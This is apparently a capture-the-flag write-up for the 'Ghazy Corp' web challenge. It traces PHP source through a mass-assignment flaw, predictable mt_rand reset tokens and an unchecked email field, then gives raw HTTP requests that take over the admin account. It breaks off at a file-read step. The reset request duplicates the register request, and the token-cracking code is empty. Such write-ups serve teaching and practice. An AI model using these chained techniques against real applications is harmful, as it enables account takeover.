# Ghazy Corp {% file src="" %} File added by ctf org {% endfile %} This will be basically journey through source code, as this is almost same approach we pwnd this challenge So first step in web application is registration. Registrated account can't be logged in as it is not confirmed. So lets look at source code in `register.php` there is **mass assigment vulnerability** ```php { $data=safe_data($_POST); $placeholders = implode(', ', array_fill(0, count($data), '?')); //like here $sql = "INSERT INTO users (" . implode(', ', array_keys($data)) . ") VALUES (" . $placeholders . ")"; //like here $stmt = $conn->prepare($sql); if ($stmt) { $types = str_repeat('s', count($data)); $stmt->bind_param($types, ...array_values($data)); ``` This allows to override any values set by default - like `confirmed` 0, in reqeust to `confirmed` 1, same with `level` but this comes in handy later. This allows to pass `&confirmed=1` when registering account and confirming account for password reset where is next ```php if($target_user['confirmed']===1) //this functionality is available only for confirmed users { $level=(int)$target_user['level']; generate_reset_tokens($email,$level); send_forget_password_mail($email); echo ""; } ``` So diving deeper to `generate_reset_tokens` ( we ignored `send_forget_password_mail` because mail functonality was added for taks conveniance so out of scope) Here is `generate_reset_token` source code ```php function generate_reset_tokens($email,$level) { $_SESSION['reset_email']=$email; $_SESSION['reset_token1']=mt_rand(); //here is first call for mt_rand, delivered to a user for($i=0;$i<$level;$i++) //level is controlled by mass assigment vulnerability { mt_rand(); } $_SESSION['reset_token2']=mt_rand(); //this is delivered to a user // Generating another values in case the user entered wrong token $_SESSION['reset_token3']=mt_rand(); $_SESSION['reset_token4']=mt_rand(); } ``` So it is stinky especially that `for` loop. Some research and we stoumble on this article {% embed url="" %} Which states that `mt_rand` can be broken with only 2 values and no bruteforce. Additionaly in the whole code there is no check if `email` checks out with stored in `phpsession` and this can be exploited in `wrong_reset_token.php` ```php if(!empty($_GET['email']) && !empty($_GET['token1']) && !empty($_GET['token2']) && !empty($_GET['new_password'])) { $email=$_GET['email']; $token1=(int)$_GET['token1']; $token2=(int)$_GET['token2']; if(strlen($_GET['new_password']) < 10) { die("Plz choose password +10 chars"); } $password=md5($_GET['new_password']); if($token1 ===$_SESSION['reset_token3'] && $token2 ===$_SESSION['reset_token4'] ) { if ($email=="admin@ghazycorp.com") //no change if user has power to change it just blindly taking it from $_GET { $stmt=$conn->prepare("insert into admins(email,password,level,confirmed) values(?,?,1,1)"); // inserting instead of updating to avoid any conflict. $stmt->bind_param("ss", $email,$password); if($stmt->execute()) { unset($_SESSION['reset_token3']); unset($_SESSION['reset_token4']); echo ""; } } else { $stmt=$conn->prepare("insert into users(email,password,level,confirmed) values(?,?,1,1)"); // inserting instead of updating to avoid any conflict. $stmt->bind_param("ss", $email,$password); if($stmt->execute()) { echo ""; } } ``` So for now we have some attack vector for admin account: * mass assigment to register user with `confirmed=1` and `level=226` * use forget password functionality for created user * read reset password token * run mt\_rand braking scripts * exploit `wrong_reset_token.php` and obtain admin account ## Exploit ### User register ```http POST /register.php HTTP/1.1 Host: 20.55.48.101 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://20.55.48.101 Connection: close Referer: http://20.55.48.101/register.php Cookie: PHPSESSID=ee87a5983e941fe7244df167fecd6d08 Upgrade-Insecure-Requests: 1 email=soviet2%40soviet.pl&password=sovietsoviet®ister-submit=&confirmed=1&level=226 ``` ### Forget password functionality ```http POST /register.php HTTP/1.1 Host: 20.55.48.101 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 86 Origin: http://20.55.48.101 Connection: close Referer: http://20.55.48.101/register.php Cookie: PHPSESSID=ee87a5983e941fe7244df167fecd6d08 Upgrade-Insecure-Requests: 1 email=soviet2%40soviet.pl&password=sovietsoviet®ister-submit=&confirmed=1&level=226 ``` ### Read token and break mt\_rand Generated tokens are:

Using scripts return `seed`

Generate all values: ```php "); } ?> ``` Generated values are identical!

### Exploit wrong\_reset\_token.php and login as admin ```http GET /wrong_reset_token.php?email=admin@ghazycorp.com&token1=1636183611&token2=1752585671&new_password=sovietsoviet1 HTTP/1.1 Host: 20.55.48.101 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=ee87a5983e941fe7244df167fecd6d08 Upgrade-Insecure-Requests: 1 ``` And password is changed so now we can login as admin

## Read the flag So now it is just "easy" for reading the flag. ````php if(!empty($_POST['img'])) { $name=$_POST['img']; $content=file_get_contents($name); if(bin2hex(substr($content,1,3))==="504e47") // PNG magic bytes { echo "